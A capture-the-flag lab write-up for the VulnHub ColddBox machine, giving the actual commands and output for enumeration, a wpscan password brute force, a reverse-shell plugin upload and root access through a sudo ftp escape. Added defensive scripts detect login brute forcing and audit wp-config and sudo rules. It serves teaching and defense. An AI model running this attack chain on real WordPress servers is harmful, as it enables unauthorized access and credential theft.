# Colddbox - Easy

As the machine description says, this is a WordPress machine of easy difficulty. The machine can be found on [vulnhub](https://www.vulnhub.com/entry/colddbox-easy,586/). It's an interesting room, and I enjoyed the privilege escalation part the most.

### Enumeration:

1\) First I need to discover the machine's IP. I used netdiscover and found it: 10.0.2.44

**`netdiscover -i eth0 -r 10.0.0.0/16`**

2\) Next, scan all ports with nmap: **`nmap -p- -v -T5 -Pn 10.0.2.44`**

```
PORT     STATE SERVICE
80/tcp   open  http
4512/tcp open  unknown
```

3\) Now identify the services running on the open ports: **`nmap -sV -A -p 80,4512 -v 10.0.2.44`**

```
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine
4512/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
|   256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
|_  256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)
```

4\) For further enumeration I used another tool, enum4linux. Nothing was found.

**`enum4linux -v 10.0.2.44`**

![Default web page](https://2253465825-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MVtwKyoxnvnrXpBj15q%2F-MZXDS7otk0Kev3cCImQ%2F-MZXDqgk6ebatUtEFnVi%2Fimage.png?alt=media\&token=8e96f0bd-7d77-44b2-a44f-5d02f3ea3931)

5\) As the site is running WordPress, I scan it with wpscan. This scan gives me valuable info:

**`wpscan -e -v --url http://10.0.2.44/`**

```
[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress readme found: http://10.0.2.44/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.0.2.44/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
 |  - http://10.0.2.44/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>

[i] No plugins Found.
[i] No DB Exports Found.

[i] User(s) Identified:

[+] the cold in person
 | Found By: Rss Generator (Passive Detection)

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] c0ldd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
```

6\) I need some more info before starting any attack, so I enumerate the web server further. I tried directory brute forcing with gobuster:

**`gobuster dir -u http://10.0.2.44/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`**

```
===============================================================
/wp-content           (Status: 301) [Size: 311] [--> http://10.0.2.44/wp-content/]
/wp-includes          (Status: 301) [Size: 312] [--> http://10.0.2.44/wp-includes/]
/wp-admin             (Status: 301) [Size: 309] [--> http://10.0.2.44/wp-admin/]   
/hidden               (Status: 301) [Size: 307] [--> http://10.0.2.44/hidden/]     
/server-status        (Status: 403) [Size: 274]       
```

### Exploitation:

7\) I have found some interesting directories and usernames, so first I try brute forcing the /wp-admin login page: **`wpscan --url http://10.0.2.44 -e u -t 50 -P /usr/share/wordlists/rockyou.txt`**

This attack gives me a username, **c0ldd**, and a password, **9876543210**.

Now I can log in with them.

![](https://2253465825-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MVtwKyoxnvnrXpBj15q%2F-MZXDwSVjaOccVYEq45g%2F-MZXTy6gfKIEg16xfTb7%2Fimage.png?alt=media\&token=3cb1318b-174b-462e-8735-ce79a9591c21)
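The password attack in step 7 is noisy on the server side: it leaves a burst of POST requests to /wp-login.php (or /xmlrpc.php when wpscan is told to use XML-RPC) from one client. The following script is an added example, not code from the write-up or from wpscan: it parses Apache combined-format access log lines and reports any client that sends more login POSTs than a threshold inside a sliding window. The log lines are constructed, the address 10.0.2.15 is an assumed attacker IP (the page does not give the attack box's address), and the user agent string is a made-up label.

```python
"""Spot WordPress login brute forcing in Apache access logs (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache combined format: host ident user [time] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"
# endpoints that wpscan's password attack hits (wp-login by default, xmlrpc on request)
LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TIME_FMT),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],  # drop the query string
        "status": int(m.group("status")),
    }


def find_login_bursts(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: peak login POSTs inside `window`} for clients at or over threshold.

    Lines are expected in chronological order per client, as an access log is.
    """
    recent = defaultdict(deque)  # ip -> timestamps of its recent login POSTs
    peaks = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] not in LOGIN_PATHS:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:  # slide the window forward
            q.popleft()
        peaks[rec["ip"]] = max(peaks[rec["ip"]], len(q))
    return {ip: n for ip, n in peaks.items() if n >= threshold}


def _line(ip, t, method, path, status, ua):
    """Build one constructed combined-format log line."""
    return f'{ip} - - [{t.strftime(TIME_FMT)}] "{method} {path} HTTP/1.1" {status} 3012 "-" "{ua}"'


def sample_log():
    """Constructed log: one normal visitor, one junk line, one client hammering wp-login.php."""
    base = datetime(2021, 4, 30, 12, 0, 0, tzinfo=timezone.utc)
    lines = ["this line is not in combined format"]
    lines.append(_line("10.0.2.7", base, "GET", "/?p=1", 200, "Mozilla/5.0"))
    lines.append(_line("10.0.2.7", base + timedelta(seconds=5), "POST", "/wp-login.php", 302, "Mozilla/5.0"))
    for i in range(25):  # 25 login attempts in 25 seconds from the assumed attacker address
        lines.append(_line("10.0.2.15", base + timedelta(seconds=i), "POST", "/wp-login.php", 200, "scanner/1.0"))
    return lines


if __name__ == "__main__":
    for ip, n in find_login_bursts(sample_log()).items():
        print(f"{ip}: {n} login POSTs within 60s")
```

On a real host the same function can be fed `open("/var/log/apache2/access.log")` directly; the threshold and window are the knobs to tune against normal login traffic, and a lockout or rate-limit plugin in front of wp-login.php is the corresponding mitigation.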

8\) There are 4 ways to get a reverse shell from the WordPress site:

* Upload a shell through the theme
* Upload a shell through a plugin
* Edit the theme's 404.php template
* Use a pre-installed plugin's header.php

After some googling, I found two well-written articles about getting a reverse shell. Reading them won't waste your time:

* [WordPress Shell Upload](https://www.hacknos.com/wordpress-shell-upload/)
* [WordPress Plugin: Reverse Shell](https://www.sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell)

I modified the code shown below (setting my VM's IP to connect back) and uploaded it as a zip. This code works as a plugin.

![Modified shell](https://2253465825-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MVtwKyoxnvnrXpBj15q%2F-MZXXiOoRSpsK05zxzoc%2F-MZXZirgX2L3n6zAS9jv%2Fimage.png?alt=media\&token=76eae833-d145-4dc8-a37d-957408a474af)

9\) On my attack box I started a listener, then just activated the plugin from the WordPress dashboard, and I get user access.

![](https://2253465825-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MVtwKyoxnvnrXpBj15q%2F-MZXXiOoRSpsK05zxzoc%2F-MZX_1jZxNeyDky54zro%2Fimage.png?alt=media\&token=7675c9c6-dfc7-41e2-81a2-bb7953c13691)

### Privilege escalation:

(Failed attempts) I tried the approaches below and they failed, so I note them here.

I was able to create a folder in `/tmp`, so I downloaded linpeas there, but it failed to execute. The SUID search command works: **`find / -perm -u=s -type f 2>/dev/null`**, but finds nothing useful. Python3 is available on the box.

10\) After many failed attempts, I tried the command below. The WordPress config leaks the database credentials: **`cat wp-config.php | grep DB`**

```
define('DB_NAME', 'colddbox');
define('DB_USER', 'c0ldd');
define('DB_PASSWORD', 'cybersecurity');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
```
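The real problem in step 10 is not that `wp-config.php` contains a database password (WordPress needs it in clear text) but that the file is readable to more than the web server and that the DB user is also a login account on the box, so a reused password turns a web shell into a user shell. The script below is an added example, not code from the write-up or from WordPress: it parses the `define('DB_*', ...)` lines, checks whether the file mode grants read access to group or other (the WordPress hardening guidance is 0440 or 0400), and flags a DB user that matches a local account with a login shell. The sample config reuses the values shown above; the `/etc/passwd` excerpt is constructed.

```python
"""Audit wp-config.php for credential exposure and account reuse (added example)."""
import os
import re
import stat
import tempfile

DEFINE_RE = re.compile(r"define\(\s*'(?P<key>DB_[A-Z_]+)'\s*,\s*'(?P<val>[^']*)'\s*\)")

# Sample config built from the defines shown in the write-up.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'colddbox');
define('DB_USER', 'c0ldd');
define('DB_PASSWORD', 'cybersecurity');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
"""

# Constructed /etc/passwd excerpt: c0ldd has a login shell, www-data does not.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
c0ldd:x:1000:1000:c0ldd:/home/c0ldd:/bin/bash
"""


def parse_db_defines(text):
    """Return {DB_KEY: value} for every DB_* define in the config text."""
    return {m.group("key"): m.group("val") for m in DEFINE_RE.finditer(text)}


def login_users(passwd_text):
    """Usernames from /etc/passwd-style text whose shell is not nologin/false."""
    users = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) == 7 and not parts[6].endswith(("nologin", "false")):
            users.append(parts[0])
    return users


def readable_by_others(path):
    """True if the file mode grants read access to group or other."""
    return bool(os.stat(path).st_mode & (stat.S_IRGRP | stat.S_IROTH))


def audit_wp_config(path, local_users=()):
    """Return (defines, findings) for the wp-config.php at `path`."""
    with open(path, encoding="utf-8") as f:
        defines = parse_db_defines(f.read())
    findings = []
    if readable_by_others(path):
        findings.append("mode: wp-config.php is readable by group/other; use 0440 or 0400")
    user = defines.get("DB_USER")
    if user and user in set(local_users):
        findings.append(
            f"reuse-risk: DB_USER {user!r} is also a local login account; "
            "a shared password lets anyone who reads this file log in as that user"
        )
    return defines, findings


def write_sample_config(mode=0o644):
    """Write SAMPLE_WP_CONFIG to a temp file with the given mode; return its path."""
    fd, path = tempfile.mkstemp(suffix="-wp-config.php")
    with os.fdopen(fd, "w", encoding="utf-8") as f:
        f.write(SAMPLE_WP_CONFIG)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    cfg = write_sample_config()
    defines, findings = audit_wp_config(cfg, login_users(SAMPLE_PASSWD))
    print("DB user:", defines.get("DB_USER"))
    for finding in findings:
        print(" -", finding)
```

On a live host the call is `audit_wp_config("/var/www/html/wp-config.php", login_users(open("/etc/passwd").read()))`; the mitigation for the second finding is a dedicated MySQL account with its own password rather than a system user's credentials.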

11\) The DB password might be reused, so I started to try it, but there was no proper terminal and sudo would not run. So I created a terminal using python3. I have marked the steps in the picture below.

![](https://2253465825-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MVtwKyoxnvnrXpBj15q%2F-MZXxawPOYhbaumWWHqf%2F-MZY7m7jN0SJ90bYqQ1X%2F16197918041286418.png?alt=media\&token=27771aa9-478e-4ce3-9ce1-b2ba0d0b8726)

12\) Further enumeration shows three binaries that can be run as root with sudo: **`sudo -l`**

```
(root) /usr/bin/vim
(root) /bin/chmod
(root) /usr/bin/ftp
```
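Any one of the three entries above is equivalent to granting root, which is why step 13 works. The script below is an added example, not code from the write-up: it parses the `(root) /usr/bin/vim` style lines that `sudo -l` prints and flags commands whose binary is known to offer an interactive shell escape or to change file permissions arbitrarily. The lookup table is a short hand-picked subset of widely documented cases, not an exhaustive catalogue, and is meant as a starting point for a sudoers review. The sample output reuses the three rules from the page; the hostname line and the `NOPASSWD: /usr/bin/id` rule are constructed.

```python
"""Audit `sudo -l` output for rules that amount to a root shell (added example)."""
import os
import re

# "(runas) [TAG: ...] cmd1, cmd2"  e.g. "(root) NOPASSWD: /usr/bin/id"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# binary name -> why a sudo grant on it should be treated as a root grant
RISKY_BINARIES = {
    "vim": "editor with a built-in shell escape",
    "vi": "editor with a built-in shell escape",
    "ftp": "client with a local-command escape",
    "less": "pager with a shell escape",
    "more": "pager with a shell escape",
    "chmod": "can set arbitrary permissions (including setuid) on any file",
    "ALL": "unrestricted command list",
}

# Constructed sample; the three (root) rules are the ones shown in the write-up.
SAMPLE_SUDO_L = """User c0ldd may run the following commands on HOSTNAME:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/id
"""


def parse_sudo_l(text):
    """Return a list of {runas, tags, command} dicts, one per command in the output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line.strip())
        if not m:
            continue  # header lines such as "User ... may run ..."
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append({"runas": m.group("runas").strip(), "tags": tags, "command": cmd})
    return rules


def audit_rules(rules):
    """Return the rules whose binary is in RISKY_BINARIES, with the reason attached."""
    findings = []
    for rule in rules:
        binary = os.path.basename(rule["command"].split()[0])
        reason = RISKY_BINARIES.get(binary)
        if reason:
            findings.append({**rule, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        tag = " ".join(f["tags"]) or "-"
        print(f"({f['runas']}) {tag} {f['command']}: {f['reason']}")
```

The fix on the system side is to remove these entries from sudoers (or restrict them to exact arguments that cannot reach a shell) and to grant only the narrowly scoped commands the user actually needs.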

13\) Running vim could also give me root access, but I tried FTP: run ftp, then /bin/bash from inside it.

![](https://2253465825-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MVtwKyoxnvnrXpBj15q%2F-MZXgPTBab7JsOvrAOTd%2F-MZXh3SgX6QpHaqSAF2i%2Fimage.png?alt=media\&token=7e89a676-78f9-41ab-b156-75f6b147d2b4)

Thanks for reading. I hope this CTF and write-up help you.
